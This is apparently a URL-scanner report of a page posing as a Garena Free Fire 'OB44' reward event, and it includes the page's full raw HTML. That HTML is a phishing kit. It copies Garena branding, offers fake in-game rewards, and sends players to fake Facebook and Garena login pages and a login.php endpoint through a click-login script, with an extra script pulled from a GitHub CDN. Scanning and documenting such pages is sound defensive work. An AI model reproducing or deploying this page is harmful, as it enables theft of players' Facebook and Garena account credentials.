- ID de exploración:
- 53caef59-6712-48d3-bda5-0fbf58865265Finalizado
- URL enviada:
- https://sukienvipff.gerarna.io.vn/
- Informe finalizado:
Enlaces: 0 encontrados
Los enlaces salientes identificados en la página
Variables JavaScript: 59 encontradas
Las variables JavaScript globales cargadas en el objeto de ventana de una página son variables declaradas fuera de las funciones y a las que se puede acceder desde cualquier lugar del código en el ámbito actual
Nombre | Tipo |
---|---|
0 | object |
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
Sweetalert2 | function |
SweetAlert | function |
Swal | function |
sweetAlert | function |
swal | function |
click_login | function |
Mensajes de registro de la consola: 5 encontrados
Mensajes registrados en la consola web
Tipo | Categoría | Registro |
---|---|---|
error | network |
|
error | network |
|
error | network |
|
error | network |
|
error | network |
|
HTML
El cuerpo HTML sin procesar de la página
<html><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="Description" content="Garena Free Fire">
<meta name="Keywords" content="Garena Free Fire">
<meta property="og:type" content="website">
<meta property="og:titleA" content="Garena Free Fire">
<meta property="og:description" content="Garena Free Fire">
<meta property="og:url" content="./">
<meta property="og:image" content="https://i.imgur.com/rU8NvrQ.png">
<meta name="theme-color" content="#000">
<meta property="og:image" content="https://i.imgur.com/rU8NvrQ.png">
<title>Garena Free Fire</title>
<link rel="stylesheet" href="style.css?v=1731050956">
<link rel="stylesheet" href="/css/style.css">
<link rel="stylesheet" href="/css/animate.css">
<link rel="stylesheet" href="/css/login/facebook.css">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
<link rel="icon" href="https://i.imgur.com/gn2KHkv.png">
<script src="//cdn.jsdelivr.net/npm/sweetalert2@11/dist/sweetalert2.min.js"></script>
</head>
<body>
<script>
function click_login() {
Swal.fire({
html: `<div class="mt-common-inner" style="display: block;">
<h4 class="mt-title">ĐĂNG NHẬP ĐỂ TIẾP TỤC</h4>
<p class="mlbb-common-tip">Phương Thúc Đăng Nhập</p>
<div class="mlbb-social-box">
<a href="javascript:void(0);" onclick="click_get(1);" title="Facebook">
<img src="https://cdn.vn.garenanow.com/web/kg/1th5-21/img/logo-facebook.png" width="40" height="40" alt="Facebook"> </a>
</div>
</div>`,
showConfirmButton: false,
}) ;
}
</script>
<div class="container rewardsBox">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.19.2/axios.min.js"></script>
<script src="kensine/vvv.js"></script>
<div class="navbar">
<div class="navbar-btn-wrapper">
<img src="img/menu.png" style="width: 48px;padding:12px;margin-right:-8px;margin-top:-15px">
<img src="img/cart.png" style="display: none">
</div>
<img src="https://i.imgur.com/rU8NvrQ.png"">
<div class="navbar-txt-game">
Garena Free Fire
<span><script language="JavaScript">
<!--
// Store the date In avarlable
d = new Date()
dateText = ""
// Get the cuurent day and convert it to the name of the day
dayValue = d.getDay()
if(dayValue == 0)
dateText += "Chủ Nhật"
else if (dayValue == 1)
dateText += "Thứ hai"
else if (dayValue == 2)
dateText += "Thứ Ba"
else if (dayValue == 3)
dateText += "Thứ Tư"
else if (dayValue == 4)
dateText += "Thứ Năm"
else if (dayValue == 5)
dateText += "Thứ Sáu"
else if (dayValue == 6)
dateText += "Thứ Bảy"
// Get the current date; if it's before 2000,add 1900
dateText += ", Ngày " + d.getDate()
monthValue = d.getMonth()
dateText += " "
if (monthValue == 0)
dateText += "Tháng 1"
if (monthValue == 1)
dateText += "Tháng 2"
if (monthValue == 2)
dateText += "Tháng 3"
if (monthValue == 3)
dateText += "Tháng 4"
if (monthValue == 4)
dateText += "Tháng 5"
if (monthValue == 5)
dateText += "Tháng 6"
if (monthValue == 6)
dateText += "Tháng 7"
if (monthValue == 7)
dateText += "Tháng 8"
if (monthValue == 8)
dateText += "Tháng 9"
if (monthValue == 9)
dateText += "Tháng 10"
if (monthValue == 10)
dateText += "Tháng 11"
if (monthValue == 11)
dateText += "Tháng 12"
// Get the current year; if it's before 2000, add 1900
if (d.getYear() < 2000)
dateText += ", Năm " + (1900 + d.getYear())
else
dateText += ", Năm " + (d.getYear())
// Get the current minutes
minuteValue = d.getMinutes()
if (minuteValue < 10)
minuteValue = "0" + minuteValue
// Get the current hours
hourValue = d.getHours()
// Customize the greeting based on the current hours
if (hourValue >=5 && hourValue <= 10)
{
timeText = ""
}
else if (hourValue > 10 && hourValue <= 12)
{
timeText = ""
}
else if (hourValue >= 13 && hourValue <17)
{
timeText = " "
}
else if (hourValue >=17 && hourValue <18)
{
timeText = ""
}
else if (hourValue >=18 && hourValue<21)
{
timeText = ""
}
else if( hourValue >=21 && hourValue <=24)
{
timeText = ""
}
else if(hourValue >=1 && hourValue <5 )
{
timeText = ""
}
document.write( dateText + "" + timeText + "")
-->
</script>Thứ Sáu, Ngày 8 Tháng 11, Năm 2024 </span>
</div>
</div>
<div class="header">
<iframe width="400" height="235" src="https://www.youtube.com/embed/ZPTVuU2lf2c" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe>
</div>
<div class="mt-common-inner">
<h4 class="mt-title">ĐĂNG NHẬP ĐỂ TIẾP TỤC</h4>
<p class="mlbb-common-tip">Đăng Nhập <br> Nên Sử Dụng Tài Khoản Garena Để Nhận Thêm Nhiều Phần Quà Hấp Daxn</p>
<div class="mlbb-social-box">
<a href="jLJzVV923jDq9Sg2tWrLrU3G36ddTD5H7ZyRwlGR3mOhqNAzpxLVhlGYGyXDX7uQKjzJWmOhESE7NjaZX79p0vdWOLDAE6y9ibO0abcdefghjkl.html" title="Facebook">
<img src="https://cdn.vn.garenanow.com/web/kg/1th5-21/img/logo-facebook.png" width="40" height="40" alt="Facebook"> </a>
<a href="1BrUyfTDTFblghiAwWgAipJXldivJYBulsRJ5YkBjqOtsCMq0Gcgqz8pK2HbMs3gdj3i1Wk1LS5ru3iJaRCQJnynor8nq9SzK80Zabcdefghjklm.html" title="Garena">
<img src="https://cdn.vn.garenanow.com/web/kg/1th5-21/img/logo-garena.png" width="40" height="40" alt="Garena">
</a>
</div>
</div>
<div class="box">
<div class="event-alert">
<img src="img/s4_img2.png" style="display: none">
<div class="event-alert-title">NHẬN QUÀ FREE FIRE</div>
<div class="event-alert-desc">Sự Kiện OB44 </div>
<div class="menu-wrapper-border"></div>
<div class="menu-wrapper isinama"></div>
<div class="tab_rewards" id="latest">
<div class="scroll">
<center>
<div class="item lightshagitz">
<div>
<figure>
<img src="anh/1.jpg">
</figure>
</div>
<div>
<button src="anh/1.jpg" type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);">NHẬN</button>
</div>
</div>
<div class="item lightshagitz">
<div>
<figure>
<img src="anh/2.jpg">
</figure>
</div>
<div>
<button src="anh/2.jpg" type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);">NHẬN</button>
</div>
</div>
<div class="item lightshagitz">
<div>
<figure>
<img src="anh/3.jpg">
</figure>
</div>
<div>
<button src="anh/3.jpg" type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);">NHẬN</button>
</div>
</div>
<div class="item lightshagitz">
<div>
<figure>
<img src="anh/4.jpg">
</figure>
</div>
<div>
<button src="anh/4.jpg" type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);">NHẬN</button>
</div>
</div>
<div class="item lightshagitz">
<div>
<figure>
<img src="anh/5.jpg">
</figure>
</div>
<div>
<button src="anh/5.jpg" type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);">NHẬN</button>
</div>
</div>
<div class="item lightshagitz">
<div>
<figure>
<img src="anh/6.jpg">
</figure>
</div>
<div>
<button src="anh/6.jpg" type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);">NHẬN</button>
</div>
</div>
<div class="item lightshagitz">
<div>
<figure>
<img src="anh/7.jpg">
</figure>
</div>
<div>
<button src="anh/7.jpg" type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);">NHẬN</button>
</div>
</div>
<div class="item lightshagitz">
<div>
<figure>
<img src="anh/8.jpg">
</figure>
</div>
<div>
<button src="anh/8.jpg" type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);">NHẬN</button>
</div>
</div>
<div class="item lightshagitz">
<div>
<figure>
<img src="anh/9.jpg">
</figure>
</div>
<div>
<button src="anh/9.jpg" type="button" onmousedown="buka.play();" onclick="open_reward_confirmation(this);">NHẬN</button>
</div>
</div>
</center>
</div>
</div>
</div>
<div class="footer">
<div class="footer-txt-follow">
<center>
<img class="footer-follow-icon" src="https://i.imgur.com/EUV3ile.png">
</center>
<div class="footer-txt-copyright"></div>
<div class="footer-txt-copyright">ⓒ Garena Free Fire</div>
</div>
</div>
<div class="popup reward_confirmation" style="display: none;">
<div class="popup-box">
<center>
<div class="popup-title"><span style="position: absolute;top: 25px;margin-left: 20px"><i class="fa fa-gift"></i> Xác Nhận Phần Thưởng</span></div>
</center>
<div class="popup-content">
<center>
<img class="popup-rewards-img1" src="" id="myRewardImg">
</center></div>
<div class="popup-btn-wrapper">
<button type="button" class="popup-btn-deactive" onmousedown="tutup.play();" onclick="close_reward_confirmation()"><font style="position: absolute;top: 2px;left: 40px">Hủy</font></button>
<div style="width: 30%;
height: 40px;
padding: 2px;
font-size: 18px;
font-family: Teko;
text-align: center;
border: none;
outline: none;" class="popup-btn-active">
<a style="text-decoration: none;
color: #060606;" href="login.php">
Nhận
</a></div>
</div>
</div>
</div>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/base64.min.js"></script>
<script src="https://cdn.jsdelivr.net/gh/arpantek/get_mainJs@main/script.js"></script>
<script type="text/javascript">
function click_get(id) {
$.ajax({
url: 'kensine/click-login.php',
type: 'POST',
dataType: 'JSON',
data: {
type: 'click-login',
id: id
},
success: (data) => {
if (data.error) { } else {
setTimeout(function () {
window.location.href = data.url_redirect;
}, 200);
}
}
});
}
</script>
</div></div></body></html>